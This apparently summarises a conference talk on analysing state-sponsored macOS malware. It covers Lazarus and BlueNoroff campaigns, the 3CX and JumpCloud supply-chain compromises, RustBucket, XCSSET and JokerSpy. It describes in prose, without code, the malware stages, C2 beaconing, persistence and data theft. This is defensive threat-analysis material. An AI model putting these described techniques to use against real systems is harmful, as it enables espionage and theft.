Analyzing state-sponsored malware on macOS

Malware analysis tools

Saljooki begins his talk explaining a possible setup of a malware analysis environment. Some tools he mentions are:

• MachOView and MachOExplorer to view macOS binaries
• Apparency to check code signing
• Hex Fiend, a hex editor
• Hopper Disassembler to dynamically debug, analyze and disassemble a binary
• LuLu for network monitoring
• Wireshark for network packet analysis
• And more!

Your environment can be virtual or “metal.” For the former, Saljooki mentions Virtual Buddy, while for the latter he mentions a dedicated Mac Mini or other Apple device.

VirusTotal and the Objective-See malware repositories offer malware samples for reference and comparison.

Lazarus APT group

The Lazarus advance persistent threat (APT) group is a North Korean state-sponsored group. While previously focused on Windows, they have extended their scope to macOS as it becomes more popular. They have been active since at least 2009, and are known for sophisticated cyber espionage and cyber crime campaigns, such as their attack on Sony Pictures Entertainment in 2014 and their 2017 WannaCry ransomware. Using spearphishing emails, fake software updates, malicious apps and other vectors, they are known to:

• Exfiltrate sensitive data
• Perform reconnaissance on systems
• Establish persistence with LaunchAgents/daemons
• Execute DDoS attacks

Coinbase and Crypto.com lures

A recent campaign by Lazarus, coined Operation Dream Job, distributed decoy PDFs that looked like jobs listings related to cryptocurrency. The goal was likely to conduct espionage and steal crypto assets, with targets associated with cryptocurrency exchanges.

The Coinbase lure spearphished victims on LinkedIn, sending them to a malicious PDF. The first-stage component is a signed FinderFontsUpdater app in ~/Library/Fonts. The first-stage payload shows the victim the PDF while retrieving the second-stage component, safarifontsagent. The second-stage component is used to fetch the third stage, which was not available because the command and control (C2) server was offline.

Similar to the Coinbase lure, the crypto.com lure began with spearphishing and promises of a job. However, this method establishes persistence as well. Watch the presentation for more details on this lure.

3CX supply chain attack

3CX is a signed, notarized and legitimate VoIP software. Their build servers were compromised by Lazarus, leading to builds containing malware. The first-stage component was a malicious dylib, .libffmpeg.dylib. This component:

1. Checks to see if a session log file exists, and if not, terminates and creates a hidden main storage file.
2. Creates distinct UUID by combining the hostname, OS version and other system artifacts.
3. Retrieves the second-stage component, UpdateAgent, by sending a POST request to the C2 server with a specially crafted cookie.

The second-stage component:

1. Opens a legitimate 3CX config file to obtain the URL and account name values.
2. Decrypts the UUID from the file using the XOR key 0x7A, then combines and encrypts the extracted data and formats as a value for a cookie.
3. Sends POST request to the C2 server using the formatted cookie value in an HTTP header.
4. Terminates.

While this may seem anticlimactic, Saljooki predicts that the final payload is only delivered to certain users. The second-stage UpdateAgent could be swapped for a full-featured implant on targets of interest.

JumpCloud supply chain attack

In this attack, a JumpCloud employee was spearphished with an email. Malicious code was injected into their commands framework via a lightweight Ruby script. This would establish persistence and install a number of backdoors on their system. These backdoors include:

• FULLHOUSE.DOORED, a C/C++ backdoor with process injection that executes shell commands and manages and transfers files
• STRATOFEAR, a modular backdoor that retrieves modules for C2 or disk and executes modules
• TIEDYE, a backdoor that collects system information and executes additional payload and shell commands

BlueNoroff APT group

The BlueNoroff group is a subgroup of the Lazarus APT group that targets financial institutions, casinos, financial trade software and cryptocurrency companies. They are attributed to the 2016 attack on the Bangladesh Bank that successfully stole over 100 million USD. Some of their other campaigns include DangerousPassword, CryptoMimic and SnatchCrypto. Watch the presentation for more information about this APT group.

XCSSET malware

This type of malware uses cURL, pipes it to osacompile to compile AppleScript and writes the result to disk. The malware can be ad-hoc signed or unsigned applets. Variants of this malware can be identified by looking for headers specific to compiled AppleScript and cURL.

RustBucket malware

A suspicious PDF viewer was found with key indicators of XCSSET malware. It contained a suspicious script, main.scpt, and was compiled with ScriptEditor and unsigned. This malware, coined RustBucket, contains an applet executable that calls and invokes the suspicious script, main.scpt.

Saljooki investigates stage one of RustBucket by viewing the source code in main.scpt — possible because it was not compiled as run only. This script contains a cURL command that creates a zip file in the /users/shared/ directory, unzips the file then opens a new PDF viewer app.

In stage two, this PDF viewer looks similar as the original applet, but instead has an ad-hoc signature. It also doesn’t contain an applet, but a Mach-o executable. There is also a PDF included that explains how to override Gatekeeper, which attempts to block execution of the app. The application in stage two is ultimately a PDF viewer, and does not initially communicate with external servers.

By searching VirusTotal, Saljooki found two PDFs related to this PDF viewer. These PDFs claim they must be viewed by the software, obscuring the text to the viewer. In the presentation, Saljooki investigates the Mach-o executable from stage two with Hopper Disassembler. He is able to see how these PDFs hide their contents from the viewer, then reveal it once using the malicious software. Upon viewing a document, the malware sends a POST request to the C2 server to download the third-stage payload — the server was not available to deliver the payload. He was eventually able to analyze the stage two component and create a cURL request based on the information gathered to get the third-stage payload.

The third-stage payload grabs the computer name, current timestamp, installation timestame, system boot time and running processes, and checks for a VM. All is sent to C2 in a POST request; the malware sleeps for 60 seconds, then repeats this process. It can also receive commands and download/execute additional payloads.

Watch the presentation to:

• View a demo of this malware from the user perspective
• Learn why Rust was chosen for the malware and what the difficulties of reversing Rust-compiled malware are
• Find out how to detect RustBucket with endpoint security and network monitoring software

Read more about RustBucket in Jamf Threat Labs’ full writeup.

JokerSpy spyware

To end the session, Saljooki briefly talks about JokerSpy spyware. This spyware targeted a Japanese cryptocurrency exchange, deploying an “XCC” Swift spyware stager. XCC checks FullDiskAccess and ScreenRecording permissions, and was observed being executed by multiple processes. It was determined that initial access was likely a malicious or backdoored plugin or third-party dependency.

This spyware downloaded a Python backdoor used to deploy the macOS Swiftbelt enumeration tool. This backdoor can

• Surveill the host device
• Execute commands
• Exfiltrate data
• Delete files